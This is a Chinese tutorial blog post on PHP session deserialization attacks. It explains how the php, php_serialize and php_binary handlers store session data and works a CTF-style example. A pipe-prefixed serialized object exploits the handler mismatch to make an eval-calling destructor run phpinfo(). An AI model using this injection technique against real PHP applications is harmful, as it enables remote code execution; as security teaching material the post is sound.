session反序列化

补天阁2024-01-27 9:51

据陈腾师傅所说:

1.漏洞产生原因:写入格式和读取格式不一样。

下面是三种常见的存储格式:

|---------------------------|---------------------------------------------|
| 处理器 | 对应的存储格式 |
| php | 键名+竖线+经过serialize()函数序列化处理的值 |
| php_serialize(php>=5.54) | 经过serlalize()函数序列化处理的数组 |
| php_binary | 键名的长度对应的ASCII字符+键名+经过 serialize()函数反序列化处理的值 |

复制代码 
(1)php存储
<?php
session_start();
$_SRSSION['benben']=$_GET['ben'];
?>
提交:?ben=dazhuang

结果:benben|s:8:"daxhuang";

键名+竖线+经过serialize()函数序列化处理的值

**(2)**php_serialize(php>=5.54)存储

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_serialize');

session_start();

_SESSION\['benben'\] = _GET['ben'];

_SESSION\['b'\] = _GET['b'];

?>

提交:?ben=dazhuang&b=666

结果:a:2:{s:6:"benben";s:8:"dazhuang";s:1:"b";s:3:"666";}

经过serlalize()函数序列化处理的数组

(3)php_binary存储

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_binary');

session_start();

_SESSION\['benben'\] = _GET['ben'];

_SESSION\['b'\] = _GET['b'];

?>

提交:?ben=dazhuang&b=666

结果:ACKbenbens:8:"dazhuang";SOHbs:3:"666";

键名的长度对应的ASCII字符+键名+经过serialize()函数反序列化处理的值

来到题目实战练习:

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php');

session_start();

class D{

var $a;

function __destruct(){

eval($this->a);

}

}

?>

<?php

highlight_file(FILE);

error_reporting(0);

ini_set('session.serialize_handler','php_serialize');

session_start();

_SESSION\['ben'\] = _GET['a'];

?>

这里有两个网页分别对应的两段代码,我们只能在页面2上提交,还是老样子,反序列化的很多漏洞开头都是一样的,都要先进行一次正常的反序列化

复制代码 
<?php
class D{
    var $a= "phpinfo();";
}
echo serialize(new D());

O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

到这里,我们得先明白我们要做什么,我们传参a是以php_serialize格式写进去的,但是读取是php读取的,

当我们提交:?a=|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

经过php_serialize保存后,变成了:a:1:{s:3:"ben";s:39:"|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}//全都是经过serlalize()函数序列化处理的数组

**经过PHP读取后,**a:1:{s:3:"ben";s:39:"|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}变成了键名+竖线+经过serialize()函数序列化处理的值,

正好我要的经过serialize()函数序列化处理的值就是O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}这堆可以执行phpinfo的代码,所以漏洞利用成功的。

提交:?a=|O:1:"D":1:{s:1:"a";s:10:"phpinfo();";}

希望大家能够从文章中收获知识!谢谢!

相关推荐
FYKJ_201011 小时前
springboot大学校园论坛管理系统--附源码42669
java·javascript·spring boot·python·spark·django·php
饮长安千年月19 小时前
Linux下的敏感目录
linux·网络·数据库·web安全
饮长安千年月21 小时前
一带一路暨金砖国家技能发展与技术创新大赛网络安全防护与治理-Linux 安全基线加固
web安全·ctf·金砖国家技能发展与技术创新大赛·网络安全防护与治理
东方隐侠安全团队-千里21 小时前
圆桌会议复盘,WAF/HIDS建设如何走出告警泥潭?
web安全
饮长安千年月1 天前
一带一路暨金砖国家技能发展与技术创新大赛网络安全防护与治理-Linux应急响应手册
linux·运维·web安全·ctf·应急响应
Rhystt1 天前
furryCTF题解|Web方向|ezmd5、猫猫最后的复仇
android·前端·web安全·web
ShoreKiten1 天前
ctfshowweb入门 SSTI模板注入专题保姆级教程(三)
web安全·ssti·ctfshow
Jerry_Gao9211 天前
【CTF】【ez-upload】FrankenPHP(v1.11.1)Unicode路径解析漏洞
安全·php·ctf·frankenphp
сокол2 天前
【网安-Web渗透测试-漏洞系列】RCE漏洞
web安全·php
ShoreKiten2 天前
ctfshowweb入门 SSTI模板注入专题保姆级教程(二)
web安全·flask·ssti·ctfshow
热门推荐
01GitHub 镜像站点02Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services03AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot04HTML 早已不是标签了,它现在是系统级接口:这 9 个 API 直接干翻常用 JS 库05如何解决 OpenClaw “Pairing required” 报错:两种官方解决方案详解06全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)07【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆08MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法09openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南10配置 OpenClaw 使用 Ollama 本地模型